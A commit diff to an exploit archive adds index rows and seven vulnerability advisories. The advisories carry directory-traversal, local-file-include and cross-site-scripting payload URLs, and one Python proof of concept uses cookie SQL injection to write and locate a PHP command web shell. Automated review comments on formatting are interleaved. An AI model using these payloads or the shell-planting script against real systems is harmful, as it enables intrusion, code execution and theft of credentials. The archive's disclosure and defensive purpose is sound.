Update: 2014-12-30
7 new exploits
parent
fa9aebca13
commit
5ab0a9cb63
9 changed files with 156 additions and 1 deletions
|
@ -8,7 +8,7 @@ id,file,description,date,author,platform,type,port
|
|||
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
|
||||
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
|
||||
9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
|
||||
13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
|
||||
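Review bot: The retitled row for id 10 now reads "Samba <= 2.2.8", but the neighbouring descriptions express version ranges three different ways ("2.2.x" on id 7, "<= 2.0.44" on id 11, "< 2.4.20" on id 12). If the index is meant to be searched by affected version, pick one range notation, and state in the commit message which source confirms that releases before 2.2.8 are affected, since this change widens the stated scope of the entry.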
|
@ -32106,3 +32106,10 @@ id,file,description,date,author,platform,type,port
|
|||
35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
|
||||
35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
|
||||
35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
|
||||
35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0
|
||||
35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 'module' Parameter Cross Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0
|
||||
35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0
|
||||
35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 '_zp_themeroot' Parameter Multiple Cross Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 'lang' Parameter Cross Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0
|
||||
35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0
|
||||
35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 Local File Include and Cross Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0
|
||||
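Review bot: The new rows jump from id 35645 to 35647, and the descriptions in this hunk name the same bug class three ways ("XSS" on 35641 and 35642, "Cross-Site Scripting" on 35643, "Cross Site Scripting" on 35645, 35648 and 35649). Please confirm that 35646 is left out on purpose, and normalise the class name so that one search over the description column returns every entry a defender needs to triage.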
|
|
|
|
@ -1,3 +1,6 @@
|
|||
# Mirror: http://pastebin.com/raw.php?i=CZChGAnG
|
||||
# Video: https://www.youtube.com/watch?v=V7bnLOohqqI
|
||||
|
||||
#!/usr/bin/python
|
||||
#-*- coding: utf-8 -*
|
||||
|
||||
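Review bot: The hunk grows the head of the file from three lines to six by placing the "# Mirror:" and "# Video:" comments and a blank line above "#!/usr/bin/python", so the shebang is no longer the first line and the "coding: utf-8" declaration falls below line 2, where Python no longer honours it. Move the two reference comments below the interpreter and encoding lines. Both references point at third-party hosts (pastebin, YouTube) whose content can change or disappear, so a one-line summary of what each contains would keep the entry useful.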
|
|
10
platforms/linux/remote/35644.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/47509/info
|
||||
|
||||
Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||
|
||||
Viola DVR VIO-4/1000 is vulnerable; other products may also be affected.
|
||||
|
||||
http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
|
||||
http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd
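Review bot: This advisory is a plain-text file but is committed with the executable bit set ("Executable file" in the file header), as are the other .txt entries added in this commit. Text notes in a repository that also holds proof-of-concept code should be mode 0644 so that nothing in a working copy is runnable by accident. The text also names no fix or mitigation for the FILEFAIL and FILECAMERA parameters; a line saying whether a vendor fix exists would help readers who operate the device.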
|
9
platforms/php/webapps/35645.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47519/info
|
||||
|
||||
Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?module=<script>alert(8888)</script>
|
9
platforms/php/webapps/35647.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47526/info
|
||||
|
||||
SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
|
||||
http://www.example.com/index.php?menu=../../../proc/self/environ
|
||||
http://www.example.com/index1.php?menu=../../../etc/passwd
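Review bot: Unlike the other advisories in this commit, this one has no "<product> <version> is vulnerable" line (only an empty line sits where it would be), and the index row for 35647 carries no version either. Add the affected version, or state that it is unknown, so the entry can be matched against an installed release. The two examples use different scripts (index.php and index1.php), which the text should name where it says "multiple".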
|
11
platforms/php/webapps/35648.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/47528/info
|
||||
|
||||
Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
|
||||
|
||||
http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
|
9
platforms/php/webapps/35649.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/47540/info
|
||||
|
||||
todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
todoyu 2.0.8 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
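Review bot: The example path is lib/js/jscalendar/php/test.php, a test script under a bundled calendar component, but the advisory and the index row attribute the issue only to todoyu 2.0.8. Name the component and file in the description so the entry can be matched by other installations that ship the same script, and mention that removing test files from deployed trees is a mitigation that does not depend on a vendor fix.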
|
84
platforms/php/webapps/35650.py
Executable file
|
@ -0,0 +1,84 @@
|
|||
source: http://www.securityfocus.com/bid/47541/info
|
||||
|
||||
LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
LightNEasy 3.2.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
# ------------------------------------------------------------------------
|
||||
# Software................LightNEasy 3.2.3
|
||||
# Vulnerability...........SQL Injection
|
||||
# Threat Level............Critical (4/5)
|
||||
# Download................http://www.lightneasy.org/
|
||||
# Discovery Date..........4/21/2011
|
||||
# Tested On...............Windows Vista + XAMPP
|
||||
# ------------------------------------------------------------------------
|
||||
# Author..................AutoSec Tools
|
||||
# Site....................http://www.autosectools.com/
|
||||
# Email...................John Leitch <john@autosectools.com>
|
||||
# ------------------------------------------------------------------------
|
||||
#
|
||||
#
|
||||
# --Description--
|
||||
#
|
||||
# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
|
||||
# extract arbitrary data. In some environments it may be possible to
|
||||
# create a PHP shell.
|
||||
#
|
||||
#
|
||||
# --PoC--
|
||||
|
||||
import socket
|
||||
|
||||
host = 'localhost'
|
||||
path = '/lne323'
|
||||
shell_path = '/shell.php'
|
||||
port = 80
|
||||
|
||||
def upload_shell():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.settimeout(8)
|
||||
|
||||
s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n'
|
||||
'Host: localhost\r\n'
|
||||
'Proxy-Connection: keep-alive\r\n'
|
||||
'User-Agent: x\r\n'
|
||||
'Content-Length: 73\r\n'
|
||||
'Cache-Control: max-age=0\r\n'
|
||||
'Origin: null\r\n'
|
||||
'Content-Type: multipart/form-data; boundary=----x\r\n'
|
||||
'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n'
|
||||
'Accept: text/html\r\n'
|
||||
'Accept-Language: en-US,en;q=0.8\r\n'
|
||||
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
|
||||
'\r\n'
|
||||
'------x\r\n'
|
||||
'Content-Disposition: form-data; name="submit"\r\n'
|
||||
'\r\n'
|
||||
'\r\n'
|
||||
'------x--\r\n'
|
||||
'\r\n')
|
||||
|
||||
resp = s.recv(8192)
|
||||
|
||||
http_ok = 'HTTP/1.1 200 OK'
|
||||
|
||||
if http_ok not in resp[:len(http_ok)]:
|
||||
print 'error uploading shell'
|
||||
return
|
||||
else: print 'shell uploaded'
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((host, port))
|
||||
s.settimeout(8)
|
||||
|
||||
s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
|
||||
'Host: ' + host + '\r\n\r\n')
|
||||
|
||||
if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
|
||||
else: print 'shell located at http://' + host + shell_path
|
||||
|
||||
upload_shell()
|
||||
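Review bot: The first lines of this .py file (the "source:" line and the three advisory paragraphs) are not commented, so the file is not valid Python as committed; prefix them with "#" like the author's own header block that follows. The index row classifies 35650 as "SQL Injection Vulnerability", while the author's description says a PHP shell may be created and the request uses INTO OUTFILE, so the description should state file write as the impact. For defenders that points at the database account's FILE privilege and write permissions on the web root as the controls to check.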
|
13
platforms/php/webapps/35651.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/47542/info
|
||||
|
||||
Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.
|
||||
|
||||
The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Dolibarr 3.0.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
|
||||
|
||||
http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
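Review bot: The file-include example ends in %00 and targets windows/win.ini, so it is specific to a Windows host and to a runtime that truncates paths at a null byte, yet the text states neither precondition. Add the tested platform and PHP version so readers can scope their exposure, and align the version string: the advisory says "Dolibarr 3.0.0" while the index row for 35651 says "Dolibarr 3.0".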
|